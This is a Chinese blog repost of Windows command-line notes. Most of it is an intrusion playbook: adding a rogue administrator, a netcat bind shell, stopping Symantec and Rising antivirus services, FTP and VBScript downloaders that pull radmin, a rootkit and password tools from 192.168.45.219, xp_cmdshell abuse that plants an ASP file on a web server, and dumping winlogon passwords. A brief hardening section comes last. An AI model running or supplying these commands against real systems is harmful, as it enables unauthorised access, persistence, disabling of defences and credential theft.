一些經典DOS命令

（1）執行cmd命令

l 通過在“執行”選單中執行cmd或者command指令。

l 通過程式的附件執行“命令提示符”

l 直接在反彈的shell中（一般是遠端控制軟體中）

說明：在有些情況下，管理員對cmd命令進行了限制，這就需要更換cmd.exe為其它一個名字，或者從本地上傳一個檔案上去。

（2）建立目錄：mkdir test

（3）更換當前路徑：cd test

（4）生成檔案：netstat –an >netlog.txt

（5）檢視檔案屬性：dir /a /s

（6）查詢指定網路連線：netstat –an |find “80” /3389

（7）給檔案加上/還原屬性：attrib –h-s-r-a

（8）建立新資料夾: mkdir hacker

（9）移動檔案netlog.txt到hacker資料夾

l move netlog.txt c:hacker

l move netlog.txt c: esthacker

（10）新增新管理員hacker

net user hacker wshacker /add

net localgroup administrators hacker /add

net user hacker

net user hacker wshakcer!!

（11）使用nc命令

l 監聽命令

netstat –an |find “8080”

nc -vv -l -p 8080 / nc -vv -l -p 8080

nc -l -p port>log.txt

l 程式定向

nc -l -p 5277 -t -e cmd.exe

在對方機器上執行,使其成為一臺telnet伺服器.

l 掃描對方埠

nc -v -ip port

eg nc -v 172.16.81.1 80

l 掃描對方tcp埠

nc -v -z ip port -port

l 掃描對方udp埠

nc -v -z -u ip port-port

l 上傳檔案

本地機器上執行:nc -v -n ip port<x:svr.exe

遠端機器上執行:nc -v -l -p port >y:svr.exe

（12）檢視系統時間：net time net view /net session /net use

（13）使用at命令：

at 檢視當前所有列表

at \ip 時間 “命令”

at 9:01 “net user aspnet wshakcer /add ”

net time

說明該命令一般是配合net time命令使用

（14）檢視遠端終端連線情況：query user /quser

（15）登出遠端終端使用者：logoff 1/2/3

（16）命令模式安裝radmin遠端控制軟體

前提：將radmin的三個服務端檔案（admdll.dll，raddrv.dll，r_server.exe）放入一個資料夾，並且已經獲得了被入侵機器的管理員密碼。

net use \ipadmin$ “密碼” /u：administrator

copy *.* \192.168.45.219admin$system32

psexec \192.168.45.219 -u user –p password cmd

然後執行命令：

netstat -an |find “4899”

net stop r_server

r_server.exe /pass:wshacker /port:4899 /save /silence

r_server.exe /install /silence

net start r_server

netstat -an |find “4899”

（17）安裝rootkit

將ntboot.exe ntboot.dll拷入系統目錄，然後執行ntboot –install命令，rootkit對80埠有效，尤其對提供web服務的埠。

客戶端呼叫比較簡單：

cli->ip地址->80埠

（18）停止和啟動服務。

Net stop /net start “服務名稱”

以下命令停止防毒軟體

net stop “Symantec AntiVirus”

net stop “Symantec AntiVirus Definition Watcher”

net stop “Symantec Event Manager”

net stop “Symantec Settings Manager”

net stop “System Event Notification”

（19）獲取網路配置情況：ipconfig /all

（20）使用指令碼下載

echo open 192.168.45.219>b

echo ftp>>b

echo bin>>b

echo get radmin.exe>>b（可以是一系列的可執行檔案）

echo bye >>b

ftp -s:b

del b

echo open 192.168.45.219 >1

echo user bin bin >>1

echo bin >>1

echo get wt.exe >>1

echo bye >>1

ftp -n -s:1

del 1

（21）dl.vbe

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe

echo set aso=.createobject(“adodb.stream”):set web=createobject(“microsoft.xmlhttp”) >>dl.vbe

echo web.open “get”,.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe

echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll

cscript dl.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll

cscript dl.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe

cscript dl.vbe [url]http://192.168.45.219/tools//mt.exe[/url] mt.exe

cscript dl.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe

(22). iget.vbe

net stop “RsRavMon Service”

net stop “Rising Personal Firewall Service”

net stop “Rising Process Communication Center“

echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe

echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe

echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.vbe

echo xPost.Open “GET”,iRemote,0 >>iget.vbe

echo xPost.Send() >>iget.vbe

echo Set sGet = createObject(“ADODB.Stream”) >>iget.vbe

echo sGet.Mode = 3 >>iget.vbe

echo sGet.Type = 1 >>iget.vbe

echo sGet.Open() >>iget.vbe

echo sGet.Write(xPost.responseBody) >>iget.vbe

echo sGet.SaveToFile iLocal,2 >>iget.vbe

dir iget.vbs

cscript iget.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll

cscript iget.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll

cscript iget.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe

cscript iget.vbe [url]http://192.168.45.219/tools/mt.exe[/url] mt.exe

cscript iget.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe

cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe

cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll

cscript iget.vbe [url]http://192.168.45.219/tools/server.exe[/url] server.exe

cscript iget.vbe [url]http://192.168.45.219/tools/lsaext.dll[/url] lsaext.dll

cscript iget.vbe [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe

cscript iget.vbe [url]http://192.168.45.219/tools/sfind.exe[/url] sfind.exe

cscript iget.vbe [url]http://192.168.45.219/tools/fp.exe[/url] fp.exe

cscript iget.vbe [url]http://192.168.45.219/tools/pulist.exe[/url] pulist.exe

cscript iget.vbe [url]http://192.168.45.219/tools/pskill.exe[/url] pskill.exe

（23）使用軟體下載

wt down [url]http://192.168.45.219/tools/AdmDll.dll[/url]

wt down [url]http://192.168.45.219/tools/regsrc.exe[/url]

wt down [url]http://192.168.45.219/tools/raddrv.dll[/url]

mt -netget [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll

mt -netget [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe

mt -netget [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe

mt -netget [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe

（24）在網站上覆制檔案

copy c: mp*.exe c:winntsystem32inetsrvdata

使用網頁木馬的檔案上傳功能。

（25）使用SQL Server 2000的xp_cmdshell

exec master.dbo.xp_cmdshell ‘命令’ —執行命令

use master –使用哪一個資料

exec master.dbo.xp_cmdshell `net user aspnet wshacker /add`

exec master.dbo.xp_cmdshell `net localgroup administrators asp2net /add`將指令碼通過網頁提交

exec xp_cmdshell `echo set fso1=createobject(“scripting.filesystemobject”)>c:
ead.vbs`

exec xp_cmdshell `echo Set WshShell = Wscript.CreateObject(“Wscript.Shell”)>>c:
ead.vbs`

exec xp_cmdshell `echo spa=WshShell.Environment(“process”)(“windir”) >>c:
ead.vbs`

exec xp_cmdshell `echo set fil =fso1.opentextfile(spa & “system32aa.txt”) >>c:
ead.vbs`

exec xp_cmdshell `echo do while not fil.atendofstream>>c:
ead.vbs`

exec xp_cmdshell `echo nr=fil.readline>>c:
ead.vbs`

exec xp_cmdshell `echo if left(nr,4)=”Path” then>>c:
ead.vbs`

exec xp_cmdshell `echo pa=mid(nr,instr(nr,”)”)+3,len(nr)-instr(nr,”)”)-3)>>c:
ead.vbs`

exec xp_cmdshell `echo exit do>>c:
ead.vbs`

exec xp_cmdshell `echo end if>>c:
ead.vbs`

exec xp_cmdshell `echo loop>>c:
ead.vbs`

exec xp_cmdshell `echo set fil1 =fso1.opentextfile(pa&”dd.asp”,2,true)>>c:
ead.vbs`

exec xp_cmdshell `echo fil1.writeline “<%response.write request.servervariables(“”APPL_PHYSICAL_PATH””)%>”>>c:
ead.vbs`

(26)查詢使用者的密碼:

l 使用pulist.exe檢視使用者的程式,找到winlogon的PID.

l 然後執行findpass.exe 域名(機器名) 使用者名稱 PID

例如: findpass.exe a administrator 204

mt –findpass

[url]ftp://192.168.99.254[/url]

(27)使用ps

l 顯示所有程式

ps /a

dir *.exe>exeback.txt & dir *.dll>dllback.txt

ps.exe /a /m >nowdlls.txt

（28）壓縮檔案

rar a -r myrar d:sinba

（29）計算機管理控制檯程式

compmgmt.exe

dcomcnfg.exe 元件服務程式

devmgmt.exe 裝置管理器程式

fsmgmt.exe 共享檔案管理

lusrmgr.msc 本地使用者和組

eventvwr.msc 日誌管理器

ht檔案

ht -fku

ht -key mima

ht -ps

htk -fku

htk -key 218123409252

htk -ps

htk -pslist

htk -pass

htk -fpass

htk -pss 192.168.1.6

htk -s 192.168.1.6 -show -run

htk -share -add 211.72.212.81 admin$

htk -share -add 211.72.50.10 admin$

安全防護

（1）檢視執行服務與埠

fport /p

（2）檢視開放的檔案及其程式

handle.exe([url]http://www.sysinternals.com/ntw2k/freeware/handle.shtml.[/url])

handle -p iexplore handle

（3）進行登陸等時間的審計（gpedit）

（4）嚴格安全日誌的管理（應用程式日誌、系統日誌、安全時間日誌）

嚴格限制%SystemRoot%system32config目錄訪問許可權，僅限管理員訪問

eventvwr.msc更改日誌檔案的預設大小

（5）去掉預設檔案共享

HKey_Local_MachineSYSTEMCurrentControlSetServiceslanmanserverparameters

新建DWORD鍵“AutoShareServer”值為0

net share

（6）加密使用者所在檔案的臨時目錄temp

C:Documents and Settings<username>Local Settings

（7）清楚頁面檔案

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management 將ClearPageFileAtShutdown鍵值設定為1

（8）嚴格控制應用程式的訪問許可權

使用win2000 資源AppSec

本文轉自 simeon2005 51CTO部落格，原文連結:http://blog.51cto.com/simeon/46571

一些經典DOS命令

相關文章